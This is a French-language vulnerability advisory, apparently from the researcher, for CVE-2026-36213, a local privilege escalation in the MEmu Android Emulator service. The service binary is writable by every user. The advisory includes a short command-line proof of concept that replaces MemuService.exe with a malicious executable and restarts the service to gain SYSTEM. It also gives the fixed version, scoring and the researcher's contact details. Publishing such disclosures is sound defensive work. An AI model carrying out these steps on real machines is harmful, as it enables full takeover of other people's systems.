
CVE-2026-36213 | Élévation de privilèges locale dans MEmu Android Emulator 9.2.7.0 via des permissions non sécurisées sur le binaire de service | Corrigé dans 9.3.2
CVE-2026-36213 | Élévation de privilèges locale dans MEmu Android Emulator 9.2.7.0 via des autorisations non sécurisées sur le binaire du service | Corrigé dans 9.3.2
Une vulnérabilité d'élévation de privilèges locale (LPE) dans MEmu Android Emulator 9.2.7.0.
Le service MEmuSVC s'exécute en tant que NT AUTHORITY\SYSTEM tandis que son binaire est modifiable par tout utilisateur local, ce qui permet une compromission totale du système.
MEmuService.exe est installé en tant que service Windows de niveau SYSTEM avec des autorisations NTFS non sécurisées :
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← Any local user has Full Control
Everyone:(F) ← World-writable binar
:: Étape 1 - Vérifier les autorisations vulnérables
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: Étape 2 - Remplacer le binaire (en tant qu'utilisateur à faibles privilèges)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: Étape 3 - Redémarrer le service
sc stop MEmuSVC && sc start MEmuSVC
:: Résultat : malicious.exe s'exécute en tant que NT AUTHORITY\SYSTEM
Disponible à l'adresse : https://github.com/sec-zone/Hijack-service-binaries
Cette recherche a été menée à des fins éducatives dans le cadre d'une politique de divulgation responsable.
L'auteur n'est pas responsable de toute mauvaise utilisation de ces informations.
Nom : Mohammad Hossein Ashofte Yazdi
Linkedin : https://www.linkedin.com/in/seczone64
Twitter : @sec_zone64
Email : [email protected]
| Champ | Détails |
|---|
| CVE | CVE-2026-36213 |
| Produit | MEmu Android Emulator (MicroVirt) |
| Version affectée | 9.2.7.0 et versions antérieures |
| Version corrigée | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |